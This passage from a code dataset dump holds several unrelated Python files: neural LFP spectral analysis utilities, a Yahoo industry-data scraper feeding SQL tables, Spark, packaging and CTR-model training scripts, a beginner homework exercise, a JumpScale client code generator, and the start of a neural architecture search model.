window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n c12_totals.append(c12)\n\n c12_totals = np.array(c12_totals)\n c12_total = c12_totals.mean(axis=0)\n\n return pfreq, psd1, psd2, psd1_ms, psd2_ms, c12, c12_nonlocked, c12_total\n\n\ndef compute_spectra_and_coherence_multi_electrode_single_trial(lfps, sample_rate, electrode_indices, electrode_order,\n window_length=0.060, increment=None, log=True,\n window_fraction=0.60, noise_floor_db=25,\n 
lags=np.arange(-20, 21, 1),\n psd_stats=None):\n \"\"\"\n :param lfps: an array of shape (ntrials, nelectrodes, nt)\n :return:\n \"\"\"\n\n if increment is None:\n increment = 2.0 / sample_rate\n\n nelectrodes, nt = lfps.shape\n freqs = get_freqs(sample_rate, window_length, increment)\n lags_ms = get_lags_ms(sample_rate, lags)\n\n spectra = np.zeros([nelectrodes, len(freqs)])\n cross_mat = np.zeros([nelectrodes, nelectrodes, len(lags_ms)])\n\n for k in range(nelectrodes):\n\n _e1 = electrode_indices[k]\n i1 = electrode_order.index(_e1)\n\n lfp1 = lfps[k, :]\n\n freqs, psd1, ps_var, phase = power_spectrum_jn(lfp1, sample_rate, window_length, increment)\n if log:\n log_transform(psd1)\n\n if psd_stats is not None:\n psd_mean, psd_std = psd_stats[_e1]\n\n \"\"\"\n plt.figure()\n plt.subplot(2, 2, 1)\n plt.plot(freqs, psd1, 'k-')\n plt.title('PSD (%d)' % _e1)\n plt.axis('tight')\n\n plt.subplot(2, 2, 3)\n plt.plot(freqs, psd_mean, 'g-')\n plt.title('Mean')\n plt.axis('tight')\n\n plt.subplot(2, 2, 4)\n plt.plot(freqs, psd_std, 'c-')\n plt.title('STD')\n plt.axis('tight')\n\n plt.subplot(2, 2, 2)\n psd1_z = deepcopy(psd1)\n psd1_z -= psd_mean\n psd1_z /= psd_std\n plt.plot(freqs, psd1_z, 'r-')\n plt.title('Zscored')\n plt.axis('tight')\n \"\"\"\n psd1 -= psd_mean\n psd1 /= psd_std\n\n spectra[i1, :] = psd1\n\n for j in range(k):\n _e2 = electrode_indices[j]\n i2 = electrode_order.index(_e2)\n\n lfp2 = lfps[j, :]\n\n cf = coherency(lfp1, lfp2, lags, window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n\n \"\"\"\n freqs,c12,c_var_amp,c_phase,c_phase_var,coherency,coherency_t = coherence_jn(lfp1, lfp2, sample_rate,\n window_length, increment,\n return_coherency=True)\n \"\"\"\n\n cross_mat[i1, i2] = cf\n cross_mat[i2, i1] = cf[::-1]\n\n return spectra, cross_mat\n\n\ndef add_region_info(agg, df):\n \"\"\" Make a new DataFrame that contains region information. 
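Adds 'reg1'/'reg2' region labels,\n    per-category PCC ('pcc_*') and selectivity ('sel_*') columns, and a global\n    selectivity column ('gs').\n    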
\"\"\"\n\n edf = pd.read_csv('/auto/tdrive/mschachter/data/aggregate/electrode_data.csv')\n\n new_data = dict()\n for key in df.keys():\n new_data[key] = list()\n\n # peek into the aggregate data to get a list of class names\n k1 = agg.class_names.keys()[0]\n stim_class_names = agg.class_names[k1][0]\n\n new_data['reg1'] = list()\n new_data['reg2'] = list()\n new_data['gs'] = list() # global selectivity\n\n for cname in stim_class_names:\n new_data['pcc_%s' % cname] = list()\n new_data['sel_%s' % cname] = list()\n\n # make a map of bird/block/hemi/electrode for fast lookup\n emap = dict()\n for k, row in edf.iterrows():\n key = (row['bird'], row['block'], row['hemisphere'], row['electrode'])\n reg = row['region']\n emap[key] = reg\n\n for k, row in df.iterrows():\n for key in df.keys():\n if key == 'segment' and row[key] == 'Call1c':\n new_data[key].append('Call1')\n else:\n new_data[key].append(row[key])\n\n bird = row['bird']\n block = row['block']\n hemi = row['hemi']\n e1 = row['e1']\n e2 = row['e2']\n\n # get the confusion matrix for this row\n index = row['index']\n mat_key = (row['decomp'], row['order'], row['ptype'])\n C = agg.confidence_matrices[mat_key][index]\n cnames = agg.class_names[mat_key][index]\n\n # compute the pcc fraction for each category\n pcc_fracs = np.zeros([len(cnames)])\n for k, cname in enumerate(cnames):\n p = C[k]\n p /= p.sum()\n pcc_fracs[k] = p[k]\n new_data['pcc_%s' % cname].append(p[k])\n\n # compute the selectivity for each category\n for k, cname in enumerate(cnames):\n i = np.ones(len(cnames), dtype='bool')\n i[k] = False\n sel = np.log2(((len(cnames) - 1) * pcc_fracs[k]) / pcc_fracs[i].sum())\n new_data['sel_%s' % cname].append(sel)\n\n # normalize the fractions so they become a distribution\n pcc_fracs /= pcc_fracs.sum()\n\n # compute the global selectivity\n if np.isnan(pcc_fracs).sum() > 0:\n gs = 0\n else:\n nz = pcc_fracs > 0\n assert np.abs(pcc_fracs.sum() - 1) < 1e-6, \"pcc_fracs.sum()=%f\" % pcc_fracs.sum()\n Hobs = -np.sum(pcc_fracs[nz] * np.log2(pcc_fracs[nz]))\n Hmax = np.log2(len(cnames))\n gs = 1. 
- (Hobs / Hmax)\n        new_data['gs'].append(gs)\n\n        key = (bird, block, hemi, e1)\n        reg1 = emap[key]\n\n        key = (bird, block, hemi, e2)\n        reg2 = emap[key]\n\n        reg1 = reg1.replace('L2b', 'L2')\n        reg1 = reg1.replace('L2A', 'L2')\n        reg1 = reg1.replace('L2B', 'L2')\n\n        reg2 = reg2.replace('L2b', 'L2')\n        reg2 = reg2.replace('L2A', 'L2')\n        reg2 = reg2.replace('L2B', 'L2')\n\n        new_data['reg1'].append(reg1)\n        new_data['reg2'].append(reg2)\n\n    return pd.DataFrame(new_data), stim_class_names\n\n\ndef get_psd_stats(bird, block, seg, hemi, data_dir='/auto/tdrive/mschachter/data'):\n    transforms_dir = os.path.join(data_dir, bird, 'transforms')\n    cf_file = os.path.join(transforms_dir, 'PairwiseCF_%s_%s_%s_%s_raw.h5' % (bird, block, seg, hemi))\n    cft = PairwiseCFTransform.load(cf_file)\n\n    electrodes = cft.df.electrode1.unique()\n\n    estats = dict()\n    for e in electrodes:\n        i = (cft.df.electrode1 == e) & (cft.df.electrode1 == cft.df.electrode2) & (cft.df.decomp == 'locked')\n        indices = cft.df['index'][i].values\n        psds = cft.psds[indices]\n        log_transform(psds)\n        estats[e] = (psds.mean(axis=0), psds.std(axis=0, ddof=1))\n    return estats\n\n\ndef compute_avg_and_ms(lfp):\n    lfp_mean = lfp.mean(axis=0)\n\n    lfp_ms_all = list()\n    ntrials, nelectrodes = lfp.shape\n    for k in range(ntrials):\n        i = np.ones([ntrials], dtype='bool')\n        i[k] = False\n        lfp_resid = lfp[k, :] - lfp[i].mean(axis=0)\n        lfp_ms_all.append(lfp_resid)\n\n    lfp_ms_all = np.array(lfp_ms_all)\n    lfp_ms = lfp_ms_all.mean(axis=0)\n\n    return lfp_mean, lfp_ms\n\n\ndef get_e2e_dists(data_dir='/auto/tdrive/mschachter/data'):\n    edata = pd.read_csv(os.path.join(data_dir, 'aggregate', 'electrode_data+dist.csv'))\n\n    # precompute distance from each electrode to each other electrode\n    e2e_dists = dict()\n    for (bird, block, hemi), gdf in edata.groupby(['bird', 'block', 'hemisphere']):\n\n        mult = 1.\n        if bird == 'GreBlu9508M':\n            mult = 4.\n\n        num_electrodes = len(gdf.electrode.unique())\n        assert num_electrodes == 16\n        e2e = dict()\n        for e1 in gdf.electrode.unique():\n            i1 = (gdf.electrode == e1)\n            assert i1.sum() == 1\n            dl2a1 = gdf.dist_l2a[i1].values[0] * mult\n            dmid1 = gdf.dist_midline[i1].values[0]\n\n            for e2 in gdf.electrode.unique():\n                i2 = (gdf.electrode == e2)\n                assert i2.sum() == 1\n                dl2a2 = gdf.dist_l2a[i2].values[0] * mult\n                dmid2 = gdf.dist_midline[i2].values[0]\n\n                e2e[(e1, e2)] = np.sqrt((dl2a1 - dl2a2) ** 2 + (dmid1 - dmid2) ** 2)\n        e2e_dists[(bird, block, hemi)] = e2e\n\n    return e2e_dists\n\n\ndef get_full_data(bird, block, segment, hemi, stim_id, data_dir='/auto/tdrive/mschachter/data'):\n    bdir = os.path.join(data_dir, bird)\n    tdir = os.path.join(bdir, 'transforms')\n\n    aprops = USED_ACOUSTIC_PROPS\n\n    # load the BioSound\n    bs_file = os.path.join(tdir, 'BiosoundTransform_%s.h5' % bird)\n    bs = BiosoundTransform.load(bs_file)\n\n    # load the StimEvent transform\n    se_file = os.path.join(tdir, 'StimEvent_%s_%s_%s_%s.h5' % (bird, block, segment, hemi))\n    print('Loading %s...' % se_file)\n    se = StimEventTransform.load(se_file, rep_types_to_load=['raw'])\n    se.zscore('raw')\n    se.segment_stims_from_biosound(bs_file)\n\n    # load the pairwise CF transform\n    pcf_file = os.path.join(tdir, 'PairwiseCF_%s_%s_%s_%s_raw.h5' % (bird, block, segment, hemi))\n    print('Loading %s...' % pcf_file)\n    pcf = PairwiseCFTransform.load(pcf_file)\n\n    def log_transform(x, dbnoise=100.):\n        x /= x.max()\n        zi = x > 0\n        x[zi] = 20 * np.log10(x[zi]) + dbnoise\n        x[x < 0] = 0\n        x /= x.max()\n\n    all_lfp_psds = deepcopy(pcf.psds)\n    log_transform(all_lfp_psds)\n    all_lfp_psds -= all_lfp_psds.mean(axis=0)\n    all_lfp_psds /= all_lfp_psds.std(axis=0, ddof=1)\n\n    # get overall biosound stats\n    bs_stats = dict()\n    for aprop in aprops:\n        amean = bs.stim_df[aprop].mean()\n        astd = bs.stim_df[aprop].std(ddof=1)\n        bs_stats[aprop] = (amean, astd)\n\n    for (stim_id2, stim_type2), gdf in se.segment_df.groupby(['stim_id', 'stim_type']):\n        print('%d: %s' % (stim_id2, stim_type2))\n\n    # get the spectrogram\n    i = se.segment_df.stim_id == stim_id\n    last_end_time = se.segment_df.end_time[i].max()\n\n    spec_freq = se.spec_freq\n    stim_spec = se.spec_by_stim[stim_id]\n    spec_t = np.arange(stim_spec.shape[1]) / se.lfp_sample_rate\n    speci = np.min(np.where(spec_t > last_end_time)[0])\n    spec_t = spec_t[:speci]\n    stim_spec = stim_spec[:, :speci]\n    stim_dur = spec_t.max() - spec_t.min()\n\n    # get the raw LFP\n    si = int(se.pre_stim_time * se.lfp_sample_rate)\n    ei = int(stim_dur * se.lfp_sample_rate) + si\n    lfp = se.lfp_reps_by_stim['raw'][stim_id][:, :, si:ei]\n    ntrials, nelectrodes, nt = lfp.shape\n\n    # get the raw spikes, spike_mat is ragged array of shape (num_trials, num_cells, num_spikes)\n    spike_mat = se.spikes_by_stim[stim_id]\n    assert ntrials == len(spike_mat)\n\n    ncells = len(se.cell_df)\n    print('ncells=%d' % ncells)\n    ntrials = len(spike_mat)\n\n    # compute the PSTH\n    psth = list()\n    for n in range(ncells):\n        # get the spikes across all trials for neuron n\n        spikes = [spike_mat[k][n] for k in range(ntrials)]\n        # make a PSTH\n        _psth_t, _psth = compute_psth(spikes, stim_dur, bin_size=1.0 / se.lfp_sample_rate)\n        psth.append(_psth)\n    psth = np.array(psth)\n\n    if hemi == 'L':\n        electrode_order = ROSTRAL_CAUDAL_ELECTRODES_LEFT\n    else:\n        electrode_order = ROSTRAL_CAUDAL_ELECTRODES_RIGHT\n\n    # get acoustic props and LFP/spike power spectra for each syllable\n    syllable_props = list()\n\n    i = bs.stim_df.stim_id == stim_id\n    orders = sorted(bs.stim_df.order[i].values)\n    cell_index2electrode = None\n    for o in orders:\n        i = (bs.stim_df.stim_id == stim_id) & (bs.stim_df.order == o)\n        assert i.sum() == 1\n\n        d = dict()\n        d['start_time'] = bs.stim_df.start_time[i].values[0]\n        d['end_time'] = bs.stim_df.end_time[i].values[0]\n        d['order'] = o\n\n        for aprop in aprops:\n            amean, astd = bs_stats[aprop]\n            d[aprop] = (bs.stim_df[aprop][i].values[0] - amean) / astd\n\n        # get the LFP power spectra\n        lfp_psd = list()\n        for k, e in enumerate(electrode_order):\n            i = (pcf.df.stim_id == stim_id) & (pcf.df.order == o) & (pcf.df.decomp == 'full') & \\\n                (pcf.df.electrode1 == e) & (pcf.df.electrode2 == e)\n\n            assert i.sum() == 1, \"i.sum()=%d\" % i.sum()\n\n            index = pcf.df[i]['index'].values[0]\n            lfp_psd.append(all_lfp_psds[index, :])\n        d['lfp_psd'] = np.array(lfp_psd)\n\n        syllable_props.append(d)\n\n    return {'stim_id': stim_id, 'spec_t': spec_t, 'spec_freq': spec_freq, 'spec': stim_spec,\n            'lfp': lfp, 'spikes': spike_mat, 'lfp_sample_rate': se.lfp_sample_rate, 'psth': psth,\n            'syllable_props': syllable_props, 'electrode_order': electrode_order, 'psd_freq': pcf.freqs,\n            'cell_index2electrode': cell_index2electrode, 'aprops': aprops}\n\n\ndef get_electrode_dict(data_dir='/auto/tdrive/mschachter/data'):\n    edata = pd.read_csv(os.path.join(data_dir, 'aggregate', 'electrode_data+dist.csv'))\n\n    edict = dict()\n\n    g = edata.groupby(['bird', 'block', 
'hemisphere', 'electrode'])\n\n    for (bird, block, hemi, electrode), gdf in g:\n        assert len(gdf) == 1\n\n        reg = clean_region(gdf.region.values[0])\n        dist_l2a = gdf.dist_l2a.values[0]\n        dist_midline = gdf.dist_midline.values[0]\n\n        if bird == 'GreBlu9508M':\n            dist_l2a *= 4\n\n        edict[(bird, block, hemi, electrode)] = {'region': reg, 'dist_l2a': dist_l2a, 'dist_midline': dist_midline}\n\n    return edict\n","sub_path":"zeebeez3/figures/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"409733433","text":"\"\"\"\nScript for setting up the sector, industry, and company tables in the 'stocks' database. \nThis script reads data from yahoo URLs, creates the tables in the database, and uploads the info into\nthe tables. The script does a lot of page access to Yahoo, so it should be run rarely.\nThere is no provision yet for updating the data; instead the tables are wiped out and recreated.\n\"\"\"\n\nimport re\n\n#import myql \nimport requests\nfrom bs4 import BeautifulSoup\n#import mechanize\nfrom sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey, Enum\n\nimport DBEngine\n\n#Yahoo industry sector page\nbase_url = 'https://biz.yahoo.com/p/'\nsectors_url = 's_conameu.html'\n\ndef get_industry_data():\n    r = requests.get(base_url+sectors_url)\n    if r.status_code != requests.codes.ok:\n        print(\"Could not open URL: \"+base_url+sectors_url)\n    \n    sectors_page = BeautifulSoup(r.text,'lxml') #parses the html into a useful tree structure\n    sectors = {} #dict with sector names as keys. Values are dicts holding the sector url and its industries.\n    template = re.compile(r'\\d+conameu.html')\n    for link in sectors_page.find_all('a'):\n        if template.match(link['href']):\n            sector_name = link.string\n            sector_name = sector_name.replace('\\n',' ',2)\n            sectors[sector_name] = {'url':link['href'],'industries':{}}\n\n    for k in sectors.keys():\n        sector_url = sectors[k]['url']\n        sector_response = requests.get(base_url+sector_url)\n        sector_page = BeautifulSoup(sector_response.text,'lxml')\n        if sector_response.status_code != requests.codes.ok:\n            print(\"Could not open URL: \"+sector_url)\n        \n        industries = {} #dict with industry name as key \n        template = re.compile(r'\\d\\d\\d+conameu.html')\n        for link in sector_page.find_all('a'):\n            if template.match(link['href']):\n                industry_string = link.string\n                industry_string = industry_string.replace('\\n',' ',2)\n                industries[industry_string] = {'url':link['href'], 'companies':{}}\n        sectors[k]['industries'] = industries\n#        break\n\n    for ks in sectors.keys():\n        industries = sectors[ks]['industries']\n        for ki in industries.keys():\n            companies = []\n            url = industries[ki]['url']\n            response = requests.get(base_url+url)\n            page = BeautifulSoup(response.text,'lxml')\n            if response.status_code != requests.codes.ok:\n                print(\"Could not open URL: \"+url)\n            name_template = re.compile(r'biz.yahoo.com/p/\\w/')\n            ticker_template = re.compile(r'finance.yahoo.com/q\\?s=(\\w+)&')\n            for link in page.find_all('a'):\n                if name_template.search(link['href']):\n                    ticker_link = link.find_next('a')\n                    m = ticker_template.search(ticker_link['href'])\n                    if m is None:\n                        continue\n                    symbol = m.group(1)\n                    name = link.string\n                    name = name.replace('\\n',' ',2)\n                    if symbol:\n                        companies.append({'ticker':symbol.upper(),'name':name}) \n                    else:\n                        print(\"Could not find symbol for link \"+link['href'])\n            industries[ki]['companies'] = companies\n#            break\n#        break\n\n    return sectors\n\n\ndef build_sector_tables(engine, sectors):\n    conn = 
engine.connect()\n sector_tables = ['sector','industry','company']\n\n for t in sector_tables:\n conn.execute('drop table if exists '+t)\n\n sector_list = sectors.keys()\n metadata = MetaData()\n sector_table = Table('sector', metadata,\n Column('id', Integer, primary_key=True),\n Column('sector', String(100)))\n\n industry_table = Table('industry', metadata,\n Column('id', Integer, primary_key=True),\n Column('sector', Enum(*sector_list)),\n Column('industry', String(100)))\n\n company_table = Table('company', metadata,\n Column('ticker', String(100)), #this should be a primary key, but don't set it here to avoid errors\n Column('name', String(100)),\n Column('industry', String(100)))\n\n metadata.create_all(engine)\n\n ins = sector_table.insert()\n for s in sector_list:\n conn.execute(ins,sector=s) \n\n ins_ind = industry_table.insert()\n ins_co = company_table.insert()\n for s in sectors.keys():\n industries = sectors[s]['industries']\n for i in industries.keys():\n companies = industries[i]['companies']\n conn.execute(ins_ind, sector=s, industry = i)\n for c in companies:\n conn.execute(ins_co, industry=i, ticker=c['ticker'], name=c['name'])\n \ndbname = 'stocks' \n#sectors = {'foo':{'url':'zip','industries':{'indA':{'companies':[{'name':'coA','ticker':'COA'}]}}},'bar':{}} #for dev only\nsectors = get_industry_data()\nprint(sectors)\nengine = DBEngine.create_engine(dbname)\nbuild_sector_tables(engine, sectors)\n\n \n\n\n \n","sub_path":"setupSectorIndustryCompany.py","file_name":"setupSectorIndustryCompany.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409051399","text":"import findspark \nfindspark.init()\nfrom pyspark.sql import SparkSession\n# Create the sparkSession\nsparkSession = SparkSession.builder.getOrCreate() \n# Create the sparkContext\nsc = sparkSession.sparkContext \n# Create RDD from file\ndepartmentsRDD = sc.textFile(\"C:\\\\data\\\\departments\")\n# Print all rows from the RDD\nfor i in departmentsRDD.collect():\n print(i)\n\n\"\"\" Output:\n\n2,Fitness\n3,Footwear\n4,Apparel\n5,Golf\n6,Outdoors\n7,Fan Shop\n\n\"\"\"\n","sub_path":"02.Create_RDD_From_File.py","file_name":"02.Create_RDD_From_File.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"387552856","text":"#!/usr/bin/env python3\n\nfrom setuptools import setup, find_packages\nimport io\nimport model_history\n\n\nwith io.open(\"README.md\", \"rt\", encoding=\"utf-8\") as fp:\n long_description = fp.read()\n\n\nsetup(\n packages=find_packages(),\n include_package_data=True,\n name=\"django-model-history\",\n version=model_history.__version__,\n description=\"Save model history\",\n long_description=long_description,\n author=model_history.__author__,\n author_email=model_history.__email__,\n url=\"https://bitbucket.org/rsalmaso/django-model-history\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Natural Language :: English\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n ],\n install_requires=[\"django\", \"djangorestframework\"],\n 
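# install as a real directory (not a zipped egg) so package data stays accessible on disk\n    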
zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"621414308","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nimport math\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.metrics import make_scorer\nfrom sklearn.model_selection import StratifiedKFold\nimport time\nfrom model import AutoInt\nimport argparse\nimport sys\nimport torch\n\n\ndef str2list(v):\n v=v.split(',')\n v=[int(_.strip('[]')) for _ in v]\n\n return v\n\n\ndef str2list2(v):\n v=v.split(',')\n v=[float(_.strip('[]')) for _ in v]\n\n return v\n\n\ndef str2bool(v):\n if v.lower() in ['yes', 'true', 't', 'y', '1']:\n return True\n elif v.lower() in ['no', 'false', 'f', 'n', '0']:\n return False\n else:\n raise argparse.ArgumentTypeError('Unsupported value encountered.')\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--is_save', action='store_true') \n parser.add_argument('--greater_is_better', action='store_true', help='early stop criterion')\n parser.add_argument('--has_residual', action='store_true', help='add residual')\n\n parser.add_argument('--blocks', type=int, default=2, help='#blocks')\n parser.add_argument('--block_shape', type=str2list, default=[16,16], help='output shape of each block')\n parser.add_argument('--heads', type=int, default=2, help='#heads') \n parser.add_argument('--embedding_size', type=int, default=16) \n parser.add_argument('--dropout_keep_prob', type=str2list2, default=[1, 1, 1]) \n parser.add_argument('--epoch', type=int, default=2) \n parser.add_argument('--batch_size', type=int, default=1024) \n parser.add_argument('--learning_rate', type=float, default=0.001)\n parser.add_argument('--optimizer_type', type=str, default='adam') \n parser.add_argument('--l2_reg', type=float, default=0.0) \n parser.add_argument('--random_seed', type=int, default=2018) \n parser.add_argument('--save_path', type=str, default='./model') \n parser.add_argument('--field_size', type=int, default=39, help='#fields') \n parser.add_argument('--loss_type', type=str, default='logloss')\n parser.add_argument('--verbose', type=int, default=1)\n parser.add_argument('--run_times', type=int, default=1,help='run multiple times to eliminate error')\n parser.add_argument('--deep_layers', type=str2list, default=[300,300,300], help='config for dnn in joint train')\n parser.add_argument('--batch_norm', type=int, default=1)\n parser.add_argument('--embedding_norm', type=int, default=1)\n parser.add_argument('--batch_norm_decay', type=float, default=0.995)\n parser.add_argument('--data', default=\"avazu\", type=str, help='data name')\n parser.add_argument('--data_path', default=\"../../data\", type=str, help='root path for all the data')\n return parser.parse_args()\n\n#1049030\nfeature_size_dict = {\"avazu\": 972267, \"criteo\": 1049030, \"ipinyou\": 1015}\n\ndef _run_(args, run_cnt):\n path_prefix = os.path.join(args.data_path, args.data) \n \n Xi_valid = pd.read_hdf(os.path.join(path_prefix, \"valid_i.h5\"), 'df').values\n Xv_valid = pd.read_hdf(os.path.join(path_prefix, \"valid_v.h5\"), 'df').values\n y_valid = pd.read_hdf(os.path.join(path_prefix, \"valid_y.h5\"), 'df').values.reshape(-1)\n \n Xi_train = pd.read_hdf(os.path.join(path_prefix, \"train_i.h5\"), 'df').values\n Xv_train = pd.read_hdf(os.path.join(path_prefix, \"train_v.h5\"), 'df').values\n y_train = 
pd.read_hdf(os.path.join(path_prefix, \"train_y.h5\"), 'df').values.reshape(-1)\n \n \n feature_size = feature_size_dict[args.data]\n\n args.field_size = Xi_valid.shape[1]\n \n # test: file1, valid: file2, train: file3-10\n model = AutoInt(args=args, feature_size=feature_size, run_cnt=run_cnt)\n\n is_continue = True\n for k in range(model.epoch):\n print(\"epoch %d\" %(k+1))\n if not is_continue:\n print('early stopping at epoch %d' % (k+1))\n break\n\n time_epoch = 0\n t1 = time.time()\n is_continue = model.fit_once(Xi_train, Xv_train, y_train, k+1, 0,\n Xi_valid, Xv_valid, y_valid, early_stopping=True)\n time_epoch += time.time() - t1\n print(\"epoch %d, time %d\" % (k+1, time_epoch))\n\n print('start testing!...')\n Xi_test = pd.read_hdf(os.path.join(path_prefix, \"test_i.h5\"), 'df').values\n Xv_test = pd.read_hdf(os.path.join(path_prefix, \"test_v.h5\"), 'df').values\n y_test = pd.read_hdf(os.path.join(path_prefix, \"test_y.h5\"), 'df').values.reshape(-1)\n\n model.restore()\n\n test_result, test_loss = model.evaluate(Xi_test, Xv_test, y_test)\n \n print(\"test-result = %.4lf, test-logloss = %.4lf\" % (test_result, test_loss))\n return test_result, test_loss\n\nif __name__ == \"__main__\":\n args = parse_args()\n print(args.__dict__)\n print('**************')\n test_auc = []\n test_log = []\n timemark = time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))\n\n print('run time : %d' % args.run_times)\n for i in range(1, args.run_times + 1):\n test_result, test_loss = _run_(args, i)\n test_auc.append(test_result)\n test_log.append(test_loss)\n \n params_str = \" \".join([\"{} {}\".format(k, v) for k, v in vars(args).items()])\n info = \"[{}] | {} | {}| test auc [{:.6f}], test logloss [{:.6f}] | {} \\n\".format(\n timemark, args.data, \"autoint\", test_auc[0], test_log[0], params_str)\n\n with open(\"../../benchmark/training_info.txt\", \"a+\") as fw:\n fw.write(info) \n \n print('test_auc', test_auc)\n print('test_log_loss', test_log)\n print('avg_auc', sum(test_auc)/len(test_auc))\n print('avg_log_loss', sum(test_log)/len(test_log))\n\n","sub_path":"baseline/autoint/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"390756887","text":"\"\"\"\nn = 8\narr = [3,1,6,6,5,7,7,7]\n\ndef runnerUp(n,arr):\n if 2 <= n <= 10:\n arr_sorted = sorted(arr)\n last_higher = max(arr_sorted)\n i = 0\n\n while i < n:\n if arr[-(i+1)] == last_higher:\n i += 1\n else:\n runner_up = arr[-(i+1)]\n i = n\n\n print(runner_up)\n\n else:\n print('imput a value between [2,10]')\n\nrunnerUp(n,arr)\n\n------------------------------------\n\nn = int(input())\narr = arr(map(int, input().split()))\nzes = max(arr)\ni=0\nwhile(i 0 and paramCodeStr[-1] == \",\":\n paramCodeStr = paramCodeStr[:-1]\n if paramCodeStr != \"\":\n s = s.replace(\"{paramcodestr}\", self.descrTo1Line(paramCodeStr))\n else:\n s = s.replace(\"{paramcodestr}\", \"\")\n\n self.content += \"\\n%s\" % j.code.indent(s, 1)\n\n params = \"\"\n for var in method.vars:\n params += \"%s=%s,\" % (var.name, var.name)\n if params != \"\" and params[-1] == \",\":\n params = params[:-1]\n\n s = \"resultcode,result=self._appserverclient.wsclient.callWebService(\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",%s)\" %\\\n (self.spec.appname, self.spec.actorname, method.name.replace(\"_\", \".\"), params)\n\n s += \"\"\"\nif resultcode != 0:\n raise RuntimeError(\"error in calling webservice %s:%s:%s:%s\" )\nelse:\n if 
j.basetype.dictionary.check(result) and result.has_key(\"result\"):\n        return result[\"result\"]\n    else:\n        return result\n\"\"\" % (self.spec.appname, self.spec.actorname, method.name, params)\n\n        s += \"\\nfrom JumpScale.core.Shell import ipshell\\n\"\n        s += \"ipshell()\\n\"\n\n        #key=\"%s_%s_%s\" % (spec.appname,spec.actorname,method.name)\n        self.content += \"\\n%s\" % j.code.indent(s, 2)\n\n        return\n\n    def generate(self):\n        self.addClass()\n\n        s = \"self._appserverclient=j.clients.portal._portalClients[\\\"%s_%s_%s\\\"]\" % (self.ip, self.port, self.secret)\n        self.initprops += j.code.indent(s, 2)\n\n        for method in self.spec.methods:\n            self.addMethod(method)\n\n        return self.getContent()\n","sub_path":"lib/JumpScale/baselib/codegentools/CodeGeneratorActorRemote.py","file_name":"CodeGeneratorActorRemote.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56117736","text":"#1. At runtime, prompt the user to enter a name, gender, and age, then store the data in a dictionary; u is the user\nu = {'name':'','gender':'','age':''}\nu['name'] = input('Please enter your name:')\nu['gender'] = input('Please enter your gender:')\nu['age'] = int(input('Please enter your age:'))\n\n#2. With the data stored, print a personal introduction in this format: My name is XXX, I am XXX years old, my gender is XX, and I like writing code\nprint(f\"My name is {u['name']}, I am {u['age']} years old, my gender is {u['gender']}, and I like writing code\")\n\n#3. Someone is interested in you, and the platform needs your height and contact info; prompt the user for them and add the data to the dictionary created in task 1\nu['height']=input('Please enter your height:')\nu['contact']=input('Please enter your contact info:')\n\n#4. Use a loop to print all the information in the dictionary after task 3, in the format below (the 5 items may appear in any order)\nfor key in u:\n    print(key+':',u[key])\n\n#5. Given the list li = [11,22,33,22,22,44,55,77,88,99,11], remove the duplicate elements and then count how often each element occurs\nli = [11,22,33,22,22,44,55,77,88,99,11]\nlq = list(set(li))\nlq.sort(key=li.index)\nprint(lq)\nset1 = set(lq)\ndict1 = {}\nfor item in set1:\n    dict1.update({item:li.count(item)}) #count occurrences in the original list, not the deduplicated one\nprint(dict1)\n\n#6. li = [1,2,3,4,5,6,7,8,9]; use slicing to obtain the result [3,6,9]\nli = [1,2,3,4,5,6,7,8,9]\nliq = li[2:9:3]\nprint(liq)\n\n#7. s = 'python java php'; use slicing to extract: 'java'\ns = 'python java php'\nprint(s[7:11])\n","sub_path":"homework5/Group5/hw5_1720379.py","file_name":"hw5_1720379.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"649380937","text":"import torch.nn.functional as F\nfrom operations import *\nfrom torch.autograd import Variable\nfrom genotypes import PRIMITIVES\nfrom genotypes import Genotype\nimport numpy as np\nfrom itertools import combinations\nimport torch\n\n\nclass MixedOp(nn.Module):\n\n    def __init__(self, C, stride):\n        super(MixedOp, self).__init__()\n        self._ops = nn.ModuleList()\n        for primitive in PRIMITIVES:\n            op = OPS[primitive](C, stride, False)\n            if 'pool' in primitive:\n                op = nn.Sequential(op, nn.BatchNorm2d(C, affine=False))\n            self._ops.append(op)\n\n    def forward(self, x, weights):\n        return sum(w * op(x) for w, op in zip(weights, self._ops) if w != 0)\n\n\nclass Cell(nn.Module):\n\n    def __init__(self, steps, multiplier, C_prev_prev, C_prev, C, reduction, reduction_prev):\n        super(Cell, self).__init__()\n        self.reduction = reduction\n\n        if reduction_prev:\n            self.preprocess0 = FactorizedReduce(C_prev_prev, C, affine=False)\n        else:\n            self.preprocess0 = ReLUConvBN(C_prev_prev, C, 1, 1, 0, affine=False)\n        self.preprocess1 = ReLUConvBN(C_prev, C, 1, 1, 0, 